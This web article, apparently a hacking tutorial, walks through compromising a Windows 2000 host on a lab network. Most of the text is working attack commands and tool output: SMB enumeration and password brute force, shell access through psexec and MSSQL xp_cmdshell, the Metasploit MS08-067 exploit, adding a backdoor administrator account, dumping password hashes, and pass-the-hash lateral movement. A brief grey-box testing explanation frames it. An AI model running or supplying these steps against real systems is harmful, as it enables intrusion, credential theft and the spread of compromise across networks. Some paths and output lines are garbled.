Grey-Box Attack – The Art of Microsoft Windows Attack (Part One)

Let’s go over grey box attack. When a software or an application is created, it is vital to make several types of tests, to make sure the product is complete, secure and efficient. To make these tests, several methods are available: black box, white box, and grey box. Each of these methods offers different possibilities, which we will explain in this article.

In this article brought to you by thehiddenwiki.pw, we will be covering the grey box, which is the mixture of both black box and white box methods.

“Grey box” testing compiles the two previous approaches: they test both the functionalities and functioning of a website. That means that a tester gives an input to the system, checks that if the result is what is expected, and checks through which process this result was obtained.

In this type of tests, the tester knows the role of the system and of its functionalities and also knows (though not extensively) its internal mechanisms (especially the internal data structure and the algorithms used). However, he or she does not have access to the source code!

These tests can hardly be done during the developing phase of a project since it implies tests on the programme’s functionalities: it thus has to be in a state close to the final one for these tests to be relevant. Indeed, during “grey box” testing, testers mainly use “black box” methods, since the source code is not accessible. However, the scenario is oriented to impact the underlying processes, and thus test them too.

Of course, the “grey box” method mainly combines advantages from the “white box” and “black box” methods. We can still mention two big benefits of this method:

  • Impartiality: “grey box” tests keep a demarcation between the developers and the tester since the latter does not study the source code and can lean on the results obtained by testing the user interface.
  • Intelligence: by knowing the internal structure of the program, a tester can create more varied and smart scenario, in order to be certain to test all the functionalities, but also all the corresponding processes of the program.

At the same time, one of the main drawbacks of these tests is the following:

  • Non-exhaustiveness: given the fact that the source code is not accessible, “grey box” tests cannot hope to provide a complete coverage of the program.

Contents

Introduction

[0x01] – The Art of Microsoft Windows Attack

[0x01a] – Scanning & Enumeration

[0x01b] – Gaining Access

[0x01c] – Escalating Privilege

Introduction

In this lesson, we will show you the methods of hacking into Windows and Linux systems. Moreover, we will also show the ways to use popular hacking tools, such as nmap and Metasploit.

We divide the paper into 7 sections from 0x00 to 0x06. However, only section 0x01 to 0x04 are technical issues. Section 0x01, we show the steps to the hack into the Windows 2000 operating system. Section 0x02, we switch to talk about steps of Linux hacking.

The next section, 0x03, mentions automatic exploiting by using Metasploit combining with nmap or Nessus.
The last technical section lets you see examples of exploiting client software in order to get access to a system.

[0x01] – Grey Box Attack: The Art of Microsoft Windows Attack

In this section, we talk about attacking Windows machines in the network. We will start with scanning
and enumeration then we move to gain access to Windows system and, finally, escalating privilege
in order to control the machine completely and use the machine to attack other machines in the network.

[0x01a] – Grey Box Attack: Scanning & Enumeration

First, start with scanning by using nmap (http://nmap.org) which is the best in our opinion.

The new version of nmap improves scanning speed, maps the port with service name and adds custom script feature
which perfect for penetration testing.

The first example, We use nmap to scan for opening ports which are the channels to attack the system:

bt nmap-4.85BETA10 # nmap -sV 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.org )

Interesting ports on 192.168.80.129:
Not shown: 990 closed ports

PORT STATE SERVICE VERSION

80/tcp open http Microsoft IIS webserver 5.0
135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1433/tcp open ms-sql-s Microsoft SQL Server 2000 8.00.194; RTM
3372/tcp open msdtc?

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at  http://www.insecure.org/cgi-bin/servicefp-submit.cgi:

SF-Port3372-TCP:V=4.85BETA10%I=7%D=7/3%Time=4A4DD777%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"x18xc1nxx01")%r(RTSPRequest,6,"x18xc1nxx01")
SF:%r(HTTPOptions,6,"x18xc1nxx01")%r(Help,6,"x18xc1nxx01")%r(S
SF:SLSessionReq,6,"x18xc1nxx01")%r(FourOhFourRequest,6,"x18xc1n
SF:xx01")%r(LPDString,6,"x18xc1nxx01")%r(SIPOptions,6,"x18xc1nSF:xx01");
MAC Address: 00:0C:29:CC:CF:46 (VMware)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 71.68 seconds

From the result, we get a list of opening ports and we know that this system runs IIS, Netbios, Endpoint Mapper, SMB, MSSQL2000 and the operating system is Windows 2000 (We pick Windows 2000 as the example because we want you to see the big picture of Windows hacking).

The next step is information gathering from NetBIOS and SMB. Windows 2000 has “Null Session” vulnerability (Holy grail of Windows vulnerability) which allows us to enumerate all accounts in the system including security policies, a local group, and a file share.

We pick nmap to gather the information by using Nmap-script. In the past, we had to connect to the system through IPC$ (Null Session) then we had run command [net use 192.168.80.129 “” /u:””] after that we have enumerated the information through a tool such as Superscan4 or Winfo. Nowadays, Nmap(8.5Beta) can perform those tasks with help of Nmap-script (smb-enum-users, smb-enum-shares, Etc).

bt nmap-4.85BETA10 # nmap --script=smb-enum-users 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.org)
Interesting ports on 192.168.80.129:

Not shown: 990 closed ports

PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)

Host script results:
| smb-enum-users:
|_ SERVERAdministrator, SERVERbackup, SERVERepp, SERVERepp_contractor, SERVERGuest, SERVERIUSR_SERVER, SERVERIWAM_SERVER, SERVERJim, SERVERJohn, SERVERmary, SERVERmolly, SERVERNone, SERVERTsInternetUser

Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds

From the result, we know all the users in the target system:

– Administrator
– Backup
– epp
– epp_contractor
– Guest
– IUSR_SERVER
– IWAM_SERVER
– Jim
– John
– mary
– molly
– TsInternetUser

The Others techniques are Enumeration from “LDAP Anonymous” and SNMP Default Community string (Public/Private) that we can list all user from target system too.

“LDAP Anonymous” Using ldapminer
“Default SNMP Community String” Using snmpwalk

The shared files and folders are also important. If there is no proper permission setting, an attack may directly upload malicious files to the system.

bt nmap-4.85BETA10 # nmap --script=smb-enum-shares 192.168.80.129

Starting Nmap 4.85BETA10 (http://nmap.org)
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports

PORT STATE SERVICE

80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)

Host script results:
| smb-enum-shares:
| Anonymous shares: IPC$
|_ Restricted shares: COVERPG$, Fax$, Inetpub, scripts, ADMIN$, C$

Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds

From Result, We know all share files:

IPC Anonymous Null Session COVERPG Fax Inetpub scripts ADMIN C Next, We know all users from Null Session so we can brute-force attack for their users with Nmap-script “smb-brute”

bt nmap-4.85BETA10 # nmap --script=smb-brute 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.org )
Interesting ports on 192.168.80.129:

Not shown: 990 closed ports
PORT STATE SERVICE

80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc

MAC Address: 00:0C:29:CC:CF:46 (VMware)

<h3>Host script results:</h3>
| smb-brute:
| backup:pukcab > Login was successful
|_ epp:password > Login was successful

Nmap done: 1 IP address (1 host up) scanned in 5.93 seconds

Look at that result, We can brute weak password from users backup and epp.


[0x01b] – Grey Box Attack: Gaining Access

Now we have two account credentials for an attack, We choose the “epp” that uses the password “password.” Use psexec (Pstool from Sysinternals) to spawn command shell back to ours.

C:\psexec 192.168.80.129 -u epp -p password -e cmd.exe

PsExec v1.71 - Execute processes remotely
Copyright (C) 2001-2006 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32> ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.80.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.80.2

C:\WINNT\system32> net user

User accounts for SERVER

Administrator backup epp
epp_contractor Guest IUSR_SERVER
IWAM_SERVER Jim John
mary molly TsInternetUser
The command completed successfully.

From the result, we can spawn their command shell with epp’s privilege (Administrators) then Blah Blah Blah…

The target uses MSSQL 2000, we guess they use default username/password for MSSQL 2000 (SA/blank password). So we use osql to spawn command shell with MSSQL stored procedure xp_cmdshell. This stored procedure was a gold mine for hackers that used it for interactive command shell. Attackers can use ‘osql’ to get the shell from the target.

C:> sql -S 192.168.80.129 -U sa -P "" -Q "exec master..xp_cmdshell 'dir c:' "
output

------------------------------------------------------------------------------
Volume in drive C has no label.
Volume Serial Number is 50C0-6A72
Directory of c:
12/03/2004 04:39p 451 dir.txt
06/04/2004 03:49p

<dir>Documents and Settings
19/03/2009 12:47a<dir>Inetpub
19/03/2009 12:38a<dir>Program Files
03/07/2009 04:55p<dir>WINNT
1 File(s) 451 bytes
4 Dir(s) 3,053,559,808 bytes free</dir></dir></dir></dir>NULL

C:> osql -S 192.168.80.129 -U sa -P "" -Q "exec master..xp_cmdshell 'net user' "
output

------------------------------------------------------------------------------


Administrator backup cwh
epp epp_contractor Guest
IUSR_SERVER IWAM_SERVER Jim
John mary molly
TsInternetUser
or more errors.

Note: Nmap-script has “ms-sql-info.nse” for scanning machine that uses account ‘sa’ with blank password too.

The Lastest Worm like Conficker/Downadup, Nmap-script can scan for MS08-067 Vulnerability and System Infected Worm with “smb-check-vulns”.

bt nmap-4.85BETA10 # nmap --script=smb-check-vulns 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.or)

Interesting ports on 192.168.80.129:
Not shown: 990 closed ports

PORT STATE SERVICE

80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc

MAC Address: 00:0C:29:CC:CF:46 (VMware)

Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
|_ Conficker: Likely CLEAN

Nmap done: 1 IP address (1 host up) scanned in 1.66 seconds

Now we know target has MS08-067 vulnerability, Then use the G0d of Exploit suite > “Metasploit Framework”

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi)> show targets
msf exploit(ms08_067_netapi)> set TARGET 1
TARGET = 1
msf exploit(ms08_067_netapi)> set PAYLOAD generic/shell_bind_tcp
PAYLOAD : generic/shell_bind_tcp
msf exploit(ms08_067_netapi)> set RHOST 192.168.80.129
RHOST > 192.168.80.129
msf exploit(ms08_067_netapi)> exploit

[*] Started bind handler
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.80.131:51038 : 192.168.80.129:4444)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32> ipconfig

Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.80.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.80.2

C:\WINNT\system32>net user cwh 1234 /add
net user cwh 1234 /add
The command completed successfully.

C:\WINNT\system32>net localgroup administrators cwh /add
net localgroup administrators cwh /add
The command completed successfully.

C:\WINNT\system32> net user
net user

User accounts for:

------------------------------------------------------------------
Administrator backup cwh
epp epp_contractor Guest
IUSR_SERVER IWAM_SERVER Jim
John mary molly
TsInternetUser
The command completed with one or more errors.

The Most popular Tools for scanning, enumeration, vulnerability assessment is Nessus (www.www.nessus.org). That have many features like highspeed discovery: configuration audit, sensitive data discovery and vulnerability analysis.

[0x01c] – Grey Box Attack: Escalating Privilege

The next step to is dumping the SAM file from the target that gets all hashing. We can also use Nmap.
We can read the information in SAM file only when we have administrator’s privilege (epp’s account had administrators group).

bt nmap-4.85BETA10 # nmap --script=smb-pwdump --script-args=smbuser=epp,smbpass=password 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.org )

Interesting ports on 192.168.80.129:
Not shown: 990 closed ports

PORT STATE SERVICE

80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)

Host script results:

| smb-pwdump:
| Administrator:1010 > F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B
| backup:1005 > E84F09BA27610849AAD3B435B51404EE:94FF50F81F9885648A05438F63EA9F91
| epp:500 > E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
| epp_contractor:1007 > 60F898DDDCAE534EAAD3B435B51404EE:148301D12E96ED2CE24A20C6ED9A2EAF
| Guest:501 > A0E150C75A17008EAAD3B435B51404EE:823893ADFAD2CDA6E1A414F3EBDF58F7
| IUSR_SERVER:1001 > 0C2A09C60FF052D3518640B5D8EB223A:E9C4226B18D023A932473576E62EB5E9
| IWAM_SERVER:1002 > A373B0BEBCEED1FAD95379C32DAD5DEF:803F59A7EA1EA9A65A15310B58A015D3
| Jim:1009 > 209CA2D6E74286E9AAD3B435B51404EE:FF623167AECD14984A0A97E4D3989A89
| John:1004 > 4B69911850133174AAD3B435B51404EE:D5173C778E0F56D9FC47E3B3C829ACA7
| mary:1003 > 879980DE48006E7EAAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67
| molly:1008 > 4B69911850133174AAD3B435B51404EE:D5173C778E0F56D9FC47E3B3C829ACA7
|_ TsInternetUser:1000 > 52FE1A30EB33BA7BE3BB722E78963414:3A07E408DB9CB2331C9C527B0F4A8C52

Nmap done: 1 IP address (1 host up) scanned in 2.58 seconds

Now we have all the hash from the target system. In the past, we needed to crack the password by using a tool such as Cain or Rcrack with a technique called “rainbow tables.” Nevertheless, this technique is a huge waste of time.

Now we are able to save valuable time by employing one of the nmap features. Nmap can try to login to other machines using gathering hashes and a list of usernames. We do not need to pre-crack the hashes.

bt nmap-4.85BETA10 # cat password.txt
F703F386322B0662E72C57EF50F76A05
E52CAC67419A9A224A3B108F3FA6CB6D
209CA2D6E74286E9AAD3B435B51404EE

bt nmap-4.85BETA10 # nmap --script=smb-brute --script-args=userdb=usernames.txt,passdb=password.txt 192.168.80.1/24

Starting Nmap 4.85BETA10 ( http://nmap.org )
Interesting ports on 192.168.80.100:

PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-brute:
|_ Administrator:F703F386322B0662E72C57EF50F76A05 > Login was successful

Interesting ports on 192.168.80.135:

PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-brute:
| epp:E52CAC67419A9A224A3B108F3FA6CB6D > Login was successful
|_ Jim:209CA2D6E74286E9AAD3B435B51404EE > Login was successful

Now we can compromise other systems from the network that use the same password (Hashing with no-crack); use Passing-the-Hash with SMB suite (http://foofus.net/jmk/passhash.html) to impersonating the user without password. I use samba-3.0.22 with the patch:

./configure --with-smbmount
patch -p0 < amba-3.0.22-add-user.patch
patch -p0 < samba-3.0.22-passhash.patch


bt cwh # export SMBHASH="F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B"
bt cwh # ./smbmount //192.168.80.129/c$ /mnt/passhash -o username=administrator
Password: << Insert hash from SMBHASH (F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B) HASH PASS: Substituting user supplied NTLM HASH... HASH PASS: Substituting user supplied NTLM HASH... HASH PASS: Substituting user supplied LM HASH... bt cwh # ls /mnt/passhash/ dir.txt Documents and Settings Inetpub Program Files WINNT bt cwh #

Another tool is the pass-the-hash Toolkit (http://oss.coresecurity.com/projects/pshtoolkit.html) to impersonate the user without password.

The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Login Sessions maintained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes (YES, PASS-THE-HASH on Windows!).

We need to compromise one machine to attack another machine that uses the same credentials; now we have their command shell and use “whosthere” to find their credentials.

C:pshtoolkit_v1.4whosthere>whosthere
WHOSTHERE v1.4 - by Hernan Ochoa ([email protected], [email protected]) - (c) 2007-2008 Core Security Technologies.

This tool lists the active LSA login sessions with NTLM credentials.
(use -h for help).

-B is now used by default. Trying to find the correct addresses...Found!
The output format is: username:domain:lmhash:nthash

cwh:SERVER:00000000000000000000000000000000:8846F7EAEE8FB117AD06BDD830B7586C
Administrator:SERVER2:209CA2D6E74286E9AAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67

C:pshtoolkit_v1.4whosthere>cd ..iam
C:pshtoolkit_v1.4iam>iam.exe -r cmd.exe -h Administrator:SERVER2:209CA2D6E74286E9AAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67 -B
IAM v1.4 - by Hernan Ochoa ([email protected]ty.com, [email protected]) - (c) 2007-2008 Core Security Technologies
Parameters:
Username: Administrator
Domainname: SERVER2
LM hash: 209CA2D6E74286E9AAD3B435B51404EE
NT hash: BA69764BCCF8F41121E0B3046CE46C67
Run: cmd.exe
LSASRV.DLL version: 00050001h. A280DC0h
Checking LSASRV.DLL....skipped. (-B was specified).
Trying to obtain addresses...Ok! (AC = 75753BA0, EM = 7573FDEC)
The current logon credentials were successful changed!

Now we have Administrator credentials in the new MS-dos that should be able to compromise a number of machines in the network.


When you are ready, please continue reading The Art of the Unix / Linux Attack (Part Two).